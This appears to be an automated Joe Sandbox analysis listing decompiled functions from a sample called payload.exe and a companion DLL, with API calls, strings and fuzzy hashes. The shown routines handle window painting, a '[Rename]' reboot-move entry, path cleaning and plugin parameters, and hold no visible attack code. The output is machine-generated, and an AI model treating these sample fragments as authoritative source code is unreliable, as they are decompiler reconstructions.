				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423710;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x422f00, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423708;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: c0f94b8c962ee7b75acafc3cefd778743504d8a107dd351fe724bfdc705f9f00
Instruction ID: a0b7ce50fec83efafeb16569406a1c152c04985fcf8b97c7298fc3655e55bd79
Opcode Fuzzy Hash: c0f94b8c962ee7b75acafc3cefd778743504d8a107dd351fe724bfdc705f9f00
Instruction Fuzzy Hash: CD419B71804249AFCF058FA4CD459AFBFB9FF44310F00812AF961AA1A0C738EA50DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405A42 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405A42(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t13;
				long _t25;
				char* _t32;
				int _t38;
				void* _t39;
				intOrPtr* _t40;
				long _t43;
				CHAR* _t45;
				void* _t47;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t54;

				_t39 = __ecx;
				lstrcpyA(0x421a98, "NUL");
				_t45 =  *(_t53 + 0x18);
				if(_t45 == 0) {
					L3:
					_t13 = GetShortPathNameA( *(_t53 + 0x1c), 0x421e98, 0x400);
					if(_t13 != 0 && _t13 <= 0x400) {
						_t38 = wsprintfA(0x421698, "%s=%s\r\n", 0x421a98, 0x421e98);
						_t54 = _t53 + 0x10;
						E00405D1B(_t38, 0x421a98, 0x421e98, 0x421e98,  *((intOrPtr*)( *0x423710 + 0x128)));
						_t13 = E0040596C(0x421e98, 0xc0000000, 4);
						_t49 = _t13;
						 *(_t54 + 0x18) = _t49;
						if(_t49 != 0xffffffff) {
							_t43 = GetFileSize(_t49, 0);
							_t6 = _t38 + 0xa; // 0xa
							_t47 = GlobalAlloc(0x40, _t43 + _t6);
							if(_t47 == 0 || E004059E4(_t49, _t47, _t43) == 0) {
								L18:
								return CloseHandle(_t49);
							} else {
								if(E004058D1(_t39, _t47, "[Rename]\r\n") != 0) {
									_t50 = E004058D1(_t39, _t22 + 0xa, 0x4093b0);
									if(_t50 == 0) {
										_t49 =  *(_t54 + 0x18);
										L16:
										_t25 = _t43;
										L17:
										E00405927(_t25 + _t47, 0x421698, _t38);
										SetFilePointer(_t49, 0, 0, 0);
										E00405A13(_t49, _t47, _t43 + _t38);
										GlobalFree(_t47);
										goto L18;
									}
									_t40 = _t47 + _t43;
									_t32 = _t40 + _t38;
									while(_t40 > _t50) {
										 *_t32 =  *_t40;
										_t32 = _t32 - 1;
										_t40 = _t40 - 1;
									}
									_t25 = _t50 - _t47 + 1;
									_t49 =  *(_t54 + 0x18);
									goto L17;
								}
								lstrcpyA(_t47 + _t43, "[Rename]\r\n");
								_t43 = _t43 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E0040596C(_t45, 0, 1));
					_t13 = GetShortPathNameA(_t45, 0x421a98, 0x400);
					if(_t13 != 0 && _t13 <= 0x400) {
						goto L3;
					}
				}
				return _t13;
			}

0x00405a42
0x00405a51
0x00405a57
0x00405a68
0x00405a90
0x00405a9b
0x00405a9f
0x00405abf
0x00405ac6
0x00405ad0
0x00405add
0x00405ae2
0x00405ae7
0x00405aeb
0x00405afa
0x00405afc
0x00405b09
0x00405b0d
0x00405ba8
0x00000000
0x00405b23
0x00405b30
0x00405b54
0x00405b58
0x00405b77
0x00405b7b
0x00405b7b
0x00405b7d
0x00405b86
0x00405b91
0x00405b9c
0x00405ba2
0x00000000
0x00405ba2
0x00405b5a
0x00405b5d
0x00405b68
0x00405b64
0x00405b66
0x00405b67
0x00405b67
0x00405b6f
0x00405b71
0x00000000
0x00405b71
0x00405b3b
0x00405b41
0x00000000
0x00405b41
0x00405b0d
0x00405aeb
0x00405a6a
0x00405a75
0x00405a7e
0x00405a82
0x00000000
0x00000000
0x00405a82
0x00405bb3

APIs

lstrcpyA.KERNEL32(00421A98,NUL,?,00000000,?,00000000,00405BD5,?,?), ref: 00405A51
CloseHandle.KERNEL32(00000000), ref: 00405A75
GetShortPathNameA.KERNEL32 ref: 00405A7E

Part of subcall function 004058D1: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B2E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058E1
Part of subcall function 004058D1: lstrlenA.KERNEL32(00000000,?,00000000,00405B2E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405913

GetShortPathNameA.KERNEL32 ref: 00405A9B
wsprintfA.USER32 ref: 00405AB9
GetFileSize.KERNEL32(00000000,00000000,00421E98,C0000000,00000004,00421E98,?,?,?,?,?), ref: 00405AF4
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B03
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B3B
SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,00421698,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405B91
GlobalFree.KERNEL32(00000000), ref: 00405BA2
CloseHandle.KERNEL32(00000000), ref: 00405BA9

Part of subcall function 0040596C: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\payload.exe,80000000,00000003), ref: 00405970
Part of subcall function 0040596C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405992

Strings

%s=%s, xrefs: 00405AAF
NUL, xrefs: 00405A4B
[Rename], xrefs: 00405B23, 00405B35

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
String ID: %s=%s$NUL$[Rename]
API String ID: 222337774-4148678300
Opcode ID: 4c27ce9d423c33f638fbced1664b30ba87b14f005f57ce999c1b8a6a2e252c84
Instruction ID: 42b7cc2c3f2f4ef7c3412fd2f3d3cbe4eee66c4c235e50fd6e5efd85f9217fc4
Opcode Fuzzy Hash: 4c27ce9d423c33f638fbced1664b30ba87b14f005f57ce999c1b8a6a2e252c84
Instruction Fuzzy Hash: 9931E271A04B19ABD2206B619C89F6B3A6CDF45755F14003AFE05F62D2DA7CBC008E6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405F64 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F64(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004057D8(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405796("*?|<>/\":", _t5))) == 0) {
							E00405927(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00405f66
0x00405f6e
0x00405f82
0x00405f82
0x00405f88
0x00405f95
0x00405f95
0x00405f96
0x00405f98
0x00405f9c
0x00405f9e
0x00405fa7
0x00405fa9
0x00405fc3
0x00405fcb
0x00405fcb
0x00405fd0
0x00405fd2
0x00405fd4
0x00405fd8
0x00405fd9
0x00405fdc
0x00405fe4
0x00405fe6
0x00405fea
0x00000000
0x00000000
0x00405ff0
0x00405ff5
0x00000000
0x00000000
0x00000000
0x00405ff5
0x00405ffa

APIs

CharNextA.USER32(?), ref: 00405FBC
CharNextA.USER32(?), ref: 00405FC9
CharNextA.USER32(?), ref: 00405FCE
CharPrevA.USER32(?,?), ref: 00405FDE

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F65
"C:\Users\user\Desktop\payload.exe", xrefs: 00405FA0
*?|<>/":, xrefs: 00405FAC

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\payload.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-317645812
Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
Instruction ID: a0964663e3c08fb0288e5f4f4a0160773f2bbbf5a4d40b443b4f636863f092b1
Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
Instruction Fuzzy Hash: C611C451808F922EEB3216640C44BBB7F99CF5A760F18007BE9D4B22C2D67C5C429F6E

Uniqueness

Uniqueness Score: -1.00%

Function 00403F45 Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403F45(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x00403f57
0x00403feb
0x00000000
0x00403feb
0x00403f68
0x00403f6c
0x00000000
0x00000000
0x00403f72
0x00403f7b
0x00403f7e
0x00403f7e
0x00403f84
0x00403f8a
0x00403f8a
0x00403f96
0x00403f9c
0x00403fa3
0x00403fa6
0x00403fa9
0x00403fab
0x00403fab
0x00403fb3
0x00403fb9
0x00403fb9
0x00403fc3
0x00403fc8
0x00403fcb
0x00403fd0
0x00403fd3
0x00403fd3
0x00403fe3
0x00403fe3
0x00000000

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00403F62
GetSysColor.USER32 ref: 00403F7E
SetTextColor.GDI32(?,00000000), ref: 00403F8A
SetBkMode.GDI32(?,?), ref: 00403F96
GetSysColor.USER32 ref: 00403FA9
SetBkColor.GDI32(?,?), ref: 00403FB9
DeleteObject.GDI32(?), ref: 00403FD3
CreateBrushIndirect.GDI32(?), ref: 00403FDD

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction ID: 563dd17f99c902cd34f005863f03740a6a5938172a6e5e033378c94734032825
Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
Instruction Fuzzy Hash: B4214271908705ABC7219F68DD48F4BBFF8AF01715B048A29E895E26E0D735EA04CB55

Uniqueness

Uniqueness Score: -1.00%

Function 100021FA Relevance: 10.6, APIs: 7, Instructions: 139
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E100021FA(void* __edx, intOrPtr _a4) {
				signed int _v4;
				void* _t36;
				signed int _t37;
				void* _t38;
				void* _t47;
				signed int* _t49;
				signed int* _t50;
				void* _t51;

				_v4 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
					_t9 = _a4 + 0x818; // 0x818
					_t50 = (_v4 << 5) + _t9;
					_t36 = _t50[6];
					if(_t36 == 0) {
						goto L9;
					}
					_t47 = 0x1a;
					if(_t36 == _t47) {
						goto L9;
					}
					if(_t36 != 0xffffffff) {
						if(_t36 <= 0 || _t36 > 0x19) {
							_t50[6] = _t47;
						} else {
							_t36 = E100012AD(_t36 - 1);
							L10:
						}
						goto L11;
					} else {
						_t36 = E1000123B();
						L11:
						_t51 = _t36;
						_t13 =  &(_t50[2]); // 0x820
						_t49 = _t13;
						if(_t50[1] != 0xffffffff) {
						}
						_t37 =  *_t50;
						_t50[7] = _t50[7] & 0x00000000;
						if(_t37 > 7) {
							L27:
							_t38 = GlobalFree(_t51);
							if(_v4 == 0) {
								return _t38;
							}
							if(_v4 !=  *((intOrPtr*)(_a4 + 0x814))) {
								_v4 = _v4 + 1;
							} else {
								_v4 = _v4 & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t37 * 4 +  &M10002380))) {
								case 0:
									 *_t49 =  *_t49 & 0x00000000;
									goto L27;
								case 1:
									__eax = E100012FE(__ebp);
									goto L20;
								case 2:
									 *__ebx = E100012FE(__ebp);
									 *((intOrPtr*)(__ebx + 4)) = __edx;
									goto L27;
								case 3:
									__eax = E10001224(__ebp);
									 *(__esi + 0x1c) = __eax;
									L20:
									 *__ebx = __eax;
									goto L27;
								case 4:
									 *0x1000405c =  *0x1000405c +  *0x1000405c;
									__edi = GlobalAlloc(0x40,  *0x1000405c +  *0x1000405c);
									 *0x1000405c = MultiByteToWideChar(0, 0, __ebp,  *0x1000405c, __edi,  *0x1000405c);
									if( *__esi != 5) {
										 *(__esi + 0x1c) = __edi;
										 *__ebx = __edi;
									} else {
										__eax = GlobalAlloc(0x40, 0x10);
										_push(__eax);
										 *(__esi + 0x1c) = __eax;
										_push(__edi);
										 *__ebx = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
									}
									goto L27;
								case 5:
									if(lstrlenA(__ebp) > 0) {
										__eax = E100012FE(__ebp);
										 *__edi = __eax;
									}
									goto L27;
								case 6:
									__esi =  *(__esi + 0x18);
									__esi = __esi - 1;
									__esi = __esi *  *0x1000405c;
									__esi = __esi +  *0x10004064;
									__eax = __esi + 0xc;
									 *__edi = __esi + 0xc;
									asm("cdq");
									__eax = E10001429(__edx, __esi + 0xc, __edx, __esi);
									goto L27;
							}
						}
					}
					L9:
					_t36 = E10001224(0x10004034);
					goto L10;
				}
			}

0x1000220e
0x10002212
0x1000221d
0x1000221d
0x10002224
0x10002229
0x00000000
0x00000000
0x1000222d
0x10002230
0x00000000
0x00000000
0x10002235
0x10002240
0x10002250
0x10002247
0x10002249
0x1000225f
0x1000225f
0x00000000
0x10002237
0x10002237
0x10002260
0x10002264
0x10002266
0x10002266
0x10002269
0x10002269
0x10002271
0x10002273
0x1000227a
0x10002349
0x1000234a
0x10002355
0x1000237f
0x1000237f
0x10002365
0x10002371
0x10002367
0x10002367
0x10002367
0x00000000
0x10002280
0x10002280
0x00000000
0x10002287
0x00000000
0x00000000
0x10002290
0x00000000
0x00000000
0x1000229e
0x100022a0
0x00000000
0x00000000
0x100022a9
0x100022ae
0x100022b1
0x100022b2
0x00000000
0x00000000
0x100022be
0x100022c9
0x100022d8
0x100022e1
0x10002303
0x10002306
0x100022e3
0x100022e7
0x100022ed
0x100022ee
0x100022f1
0x100022f2
0x100022f4
0x100022fb
0x100022fb
0x00000000
0x00000000
0x10002313
0x10002316
0x10002322
0x10002324
0x00000000
0x00000000
0x10002327
0x1000232a
0x1000232b
0x10002332
0x10002339
0x1000233c
0x1000233e
0x10002341
0x00000000
0x00000000
0x10002280
0x1000227a
0x10002255
0x1000225a
0x00000000
0x1000225a

APIs

GlobalFree.KERNEL32(00000000), ref: 1000234A

Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234

GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
GlobalFree.KERNEL32(00000000), ref: 100022FB

Memory Dump Source

Source File: 00000001.00000002.1417066379.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.1417055818.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1417073030.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1417078966.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_payload.jbxd

Similarity

API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
String ID:
API String ID: 3730416702-0
Opcode ID: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
Instruction ID: bfa8c22ebd78897ea4dc14f883c746723b208fa17a75ef0c69fbb79ff87ab60c
Opcode Fuzzy Hash: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
Instruction Fuzzy Hash: B541ABB1108311EFF320DFA48884B5BB7F8FF443D1F218529F946D61A9DB34AA448B61

Uniqueness

Uniqueness Score: -1.00%

Function 100023DA Relevance: 10.6, APIs: 7, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E100023DA(intOrPtr* _a4) {
				char _v80;
				intOrPtr _v84;
				short _v92;
				intOrPtr* _t22;
				void* _t24;
				intOrPtr _t25;
				signed int _t33;
				void* _t37;
				intOrPtr _t38;
				void* _t41;

				_t37 = E10001215();
				_t22 = _a4;
				_t38 =  *((intOrPtr*)(_t22 + 0x814));
				_v84 = _t38;
				_t41 = (_t38 + 0x41 << 5) + _t22;
				do {
					if( *((intOrPtr*)(_t41 - 4)) != 0xffffffff) {
					}
					_t33 =  *(_t41 - 8);
					if(_t33 <= 7) {
						switch( *((intOrPtr*)(_t33 * 4 +  &M100024FD))) {
							case 0:
								 *_t37 = 0;
								goto L15;
							case 1:
								_push( *__eax);
								goto L13;
							case 2:
								__eax = E10001429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L14;
							case 3:
								__eax = lstrcpynA(__edi,  *__eax,  *0x1000405c);
								goto L15;
							case 4:
								__ecx =  *0x1000405c;
								__edx = __ecx - 1;
								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
								__eax =  *0x1000405c;
								 *((char*)(__eax + __edi - 1)) = __bl;
								goto L15;
							case 5:
								__ecx =  &_v80;
								_push(0x27);
								_push( &_v80);
								_push( *__eax);
								__imp__StringFromGUID2();
								__eax =  &_v92;
								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x1000405c, __ebx, __ebx);
								goto L15;
							case 6:
								_push( *__esi);
								L13:
								__eax = wsprintfA(__edi, 0x10004000);
								L14:
								__esp = __esp + 0xc;
								goto L15;
						}
					}
					L15:
					_t24 =  *(_t41 + 0x14);
					if(_t24 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t41 - 4)) > 0)) {
						GlobalFree(_t24);
					}
					_t25 =  *((intOrPtr*)(_t41 + 0xc));
					if(_t25 != 0) {
						if(_t25 != 0xffffffff) {
							if(_t25 > 0) {
								E100012D1(_t25 - 1, _t37);
								goto L24;
							}
						} else {
							E10001266(_t37);
							L24:
						}
					}
					_v84 = _v84 - 1;
					_t41 = _t41 - 0x20;
				} while (_v84 >= 0);
				return GlobalFree(_t37);
			}

0x100023e6
0x100023e8
0x100023f2
0x100023f8
0x10002402
0x10002406
0x1000240a
0x1000240a
0x10002412
0x10002418
0x1000241e
0x00000000
0x10002425
0x00000000
0x00000000
0x10002429
0x00000000
0x00000000
0x10002433
0x00000000
0x00000000
0x10002443
0x00000000
0x00000000
0x1000246f
0x10002477
0x10002481
0x10002483
0x10002488
0x00000000
0x00000000
0x1000244b
0x1000244f
0x10002451
0x10002452
0x10002454
0x10002464
0x1000246b
0x00000000
0x00000000
0x1000248e
0x10002490
0x10002496
0x1000249c
0x1000249c
0x00000000
0x00000000
0x1000241e
0x1000249f
0x1000249f
0x100024a4
0x100024b5
0x100024b5
0x100024bb
0x100024c0
0x100024c5
0x100024d1
0x100024d6
0x00000000
0x100024db
0x100024c7
0x100024c8
0x100024dc
0x100024dc
0x100024c5
0x100024dd
0x100024e1
0x100024e4
0x100024fc

APIs

Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D

GlobalFree.KERNEL32(?), ref: 100024B5
GlobalFree.KERNEL32(00000000), ref: 100024EF

Memory Dump Source

Source File: 00000001.00000002.1417066379.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.1417055818.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1417073030.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1417078966.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_payload.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
